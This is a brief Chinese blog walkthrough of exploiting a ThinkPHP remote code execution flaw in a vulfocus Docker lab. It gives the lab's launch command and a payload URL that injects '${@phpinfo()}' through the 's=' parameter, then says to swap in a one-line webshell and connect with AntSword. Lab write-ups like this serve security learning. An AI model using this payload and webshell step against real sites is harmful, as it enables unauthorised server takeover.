thinkphp框架远程代码执行

凌晨五点的星2024-07-31 11:30

一、环境

vulfocus网上自行下载

启动命令:

复制代码 
 docker run -d --privileged -p 8081:80 -v /var/run/docker.sock:/var/run/docker.sock -e VUL_IP=192.168.131.144  8e55f85571c8

一定添加--privileged不然只能拉取环境首页不显示

二、thinkphp远程代码执行

首页:

先开始资产收集:

端口:

目录:

网上搜索历史cve

输入pyload

复制代码 
http://192.168.131.144:29319/index.php?s=/index/index/name/${@phpinfo()})

命令执行

使用bp抓包

替换成一句话木马

使用蚁剑去连接

相关推荐
mingzhi6116 小时前
绿盟二面面试题
android·web安全·渗透测试
暴躁的小胡!!!17 小时前
2025年最新总结安全基础(面试题)
网络·安全·web安全
FreeBuf_17 小时前
美国国土安全部终止资助,CVE漏洞数据库项目面临停摆危机
数据库·安全·web安全
zl0_00_019 小时前
rce漏洞学习
学习·安全·web安全
ALe要立志成为web糕手19 小时前
数据库脱裤
数据库·windows·mysql·web安全·网络安全·adb·mssql
暴躁的小胡!!!21 小时前
2025年最新Web安全(面试题)
网络·安全·web安全
Fanche4041 天前
SQL 语句基础(增删改查)
运维·数据库·sql·mysql·web安全·oracle
it技术分享just_free2 天前
软考教材重点内容 信息安全工程师 第22章 网站安全需求分析与安全保护工程
web安全·网络安全·信息安全·系统安全·软考
ICT系统集成阿祥2 天前
100 个网络安全基础知识
安全·web安全
Lovely_182 天前
DDoS(分布式拒绝服务)攻击
web安全
热门推荐
01我决定放弃搞 Java 了02RAG 实践- Ollama+RagFlow 部署本地知识库03DeepSeek各版本说明与优缺点分析04计算机视觉——基于 Yolov8 目标检测与 OpenCV 光流实现目标追踪05Scipy||第三章 线性代数 (scipy.linalg)06如何在WPS和Word/Excel中直接使用DeepSeek功能07【FPGA】——DDS信号发生器设计08汽车上的各种质量:整备质量、总质量、装载质量、簧上质量、簧下质量09本地化部署AI知识库:基于Ollama+DeepSeek+AnythingLLM保姆级教程10鸿蒙界面开发(四):支付宝首页开发实战